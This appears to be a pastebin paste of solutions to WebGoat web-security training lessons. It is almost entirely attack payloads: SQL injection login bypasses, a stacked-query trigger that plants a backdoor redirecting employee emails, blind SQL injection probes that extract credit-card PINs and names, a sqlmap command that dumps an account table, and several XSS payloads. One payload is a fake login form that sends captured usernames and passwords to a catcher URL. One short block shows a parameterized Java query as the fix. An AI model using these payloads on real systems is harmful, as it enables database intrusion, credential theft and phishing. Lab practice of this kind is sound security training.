
Untitled

a guest
Apr 2nd, 2017
  1. Smith' OR 1 = 1 or last_name = 'bla
  2.  
  3. smith' OR '1' = '1
  4.  
  // Parameterized login lookup: the SQL text is a fixed string with two `?` placeholders,
  // so neither userId nor password is ever concatenated into the statement.
  5. String query = "SELECT * FROM employee WHERE userid = ? and password = ?";
  // NOTE(review): the password is matched inside the WHERE clause, which suggests it is stored
  // in a directly comparable form; confirm whether a salted-hash comparison should be used instead.
  6. try
  7. {
  // WebSession.getConnections(s) is defined outside this snippet; presumably it returns the
  // JDBC connection for session `s` (confirm against WebSession).
  8. Connection connection = WebSession.getConnections(s);
  // Requests a scroll-insensitive, read-only result set for the prepared statement.
  9. PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
  // Values are bound to placeholders 1 and 2 as string parameters, so a quote character or
  // SQL keyword inside userId or password is compared as literal text rather than parsed as SQL.
  10. statement.setString(1, userId);
  11. statement.setString(2, password);
  12. ResultSet answer_results = statement.executeQuery();
  // The try block is still open at this point: the catch/finally handling and the closing of
  // the statement and result set are not shown in this snippet.
  13.  
  14.  
  15. 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = NEW.userid
  16.  
  17. 101 and ((SELECT pin from pins where cc_number='1111222233334444') > 1000);
  18.  
  19. 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'K' );
  20. 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'j' );
  21. 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'm' );
  22. 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'm' );
  23.  
  24. Oftewel Jill
  25.  
  26. sqlmap -u "http://192.168.56.1:8080/search.php?what=1&search=search" --dump -D bookshop -T account
  27.  
  28.  
  29. </form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Get rekt skrub");} </script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
  30.  
  31. <script>alert("rekt");</script>
  32.  
  33.  
  34. <script>alert("Dangerous");</script>
  35.  
  36. <script language="javascript" type="text/javascript">alert("Ha Ha Ha");</script>
  37.  
  38. <script>alert('Bang!')</script>
  39.  
  40. <script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>"); document.write(str1);}</script>